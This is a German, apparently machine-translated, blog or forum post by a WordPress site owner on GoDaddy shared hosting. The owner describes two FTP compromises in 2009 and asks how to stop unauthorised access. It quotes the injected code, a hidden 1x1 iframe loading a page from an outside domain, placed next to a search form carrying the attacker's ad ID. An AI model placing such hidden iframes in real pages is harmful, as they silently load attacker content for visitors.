Letztes Update:
Die Dinge waren in den letzten Wochen friedlich und haben mir viel mehr über die Sicherheit und die Risiken von Websites beigebracht. Hier ist meine Version der Geschichte -
Ich habe eine ältere Version von WordPress verwendet und wahrscheinlich hat mich diese Person von Google erwischt. Ich denke, es war ein Skriptangriff. Es ist schwer zu sagen, wie und wann die Sicherheit tatsächlich gefährdet wurde, aber ich wurde am 5. November 2009 darauf aufmerksam. Ich habe zu diesem Zeitpunkt zwar einige Sicherheitsmaßnahmen ergriffen (siehe unten), aber es besteht immer die Möglichkeit, dass ich es versäumt habe, WordPress-Passwörter zu ändern, wenn Ich habe meinen Arbeitscomputer formatiert.
Jetzt habe ich alle nicht erforderlichen PHP-Skripte vom Hosting gelöscht, den Verwaltungsteil nur für meine IP zugänglich gemacht und einen bestimmten IP-Bereich blockiert, der zu Vietnam gehört. Tägliche Backups und andere Dinge. Die Sache ist, dass es so viele Variablen gibt und es zu schwierig ist, alles im Auge zu behalten. Die Hauptstunde ist darauf vorbereitet. :) :)
Ich habe einen gemeinsamen Hosting-Plan von GoDaddy und betreibe eine WordPress-Website. Meine Website wurde am 5. November 2009 zum ersten Mal gehackt. Zu diesem Zeitpunkt ersetzte der Hacker meine Anzeigen durch seine eigenen. Ich dachte, es sei wegen meiner Faulheit mit der Sicherheit passiert, aber ich habe mich so geirrt.
Ich habe meinen Computer formatiert und alles neu eingerichtet. ESET NOD32 wurde durch Microsoft Security Essentials ersetzt. Auf die neueste Version von WordPress aktualisiert. Alle Passwörter geändert. Richten Sie eine neue Datenbank ein. Und andere sicherheitsrelevante Dinge, die ich hier und da gelesen habe. Die Dinge haben eine Weile gut funktioniert, bis meine Seite heute wieder gehackt wurde.
Das letzte Mal hat der Typ mit vielen Dateien gespielt und speziell footer.php und alle werbebezogenen Dateien geändert. Aber diesmal ging er einfach an die richtige Stelle und ersetzte durch folgenden Code -
<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>
<form action="http://www.google.com/cse" id="cse-search-box">
<div>
<input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />
<input type="hidden" name="ie" value="ISO-8859-1" />
<input type="text" name="q" size="31" />
<input type="submit" name="sa" value="Search" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
Sieht so aus, als wäre diese Person nicht daran interessiert, Datenbanken usw. zu manipulieren, sondern nur Code zu platzieren und schnell Geld zu verdienen. Godaddy hat meine FTP-Protokolle weitergeleitet und es gab einen nicht autorisierten Zugriff von IP - 117.2.56.31. Diese IP gehört zu Vietnam und auch http://blackberryrss.com hat eine Verbindung zu Vietnam.
Es gibt keinen SSH-Zugriff auf mein Konto und ich verbinde mich über FireFTP mit FTP. Dies war GoDaddys Antwort beim letzten Mal -
Bei der Überprüfung Ihres Kontos haben wir festgestellt, dass Ihr FTP-Konto entweder aufgrund von Malware auf Ihrem lokalen Computer oder eines schwachen FTP- / Hosting-Passworts kompromittiert wurde.
Aber ich hatte alle Passwörter geändert, Konten gelöscht usw., aber nichts scheint zu funktionieren. Ich bin im Moment ahnungslos. Bitte sag mir was zu tun ist? Wie kann ich den unbefugten Zugriff auf mein Konto verhindern?
Zusätzliche Details:
- Die Stärke des Passworts ist nur stark, aber nicht am besten.
- Ich persönlich verwende Windows XP SP3, Windows Firewall usw. Nach dem ersten Angriff habe ich gelernt, mit einem Benutzerkonto zu arbeiten und ein Administratorkonto zu vermeiden.
- Wenn ich FTP-Protokolle für den ersten Angriff sehe, ist es ziemlich klar, dass die Person dies alles manuell ausführt.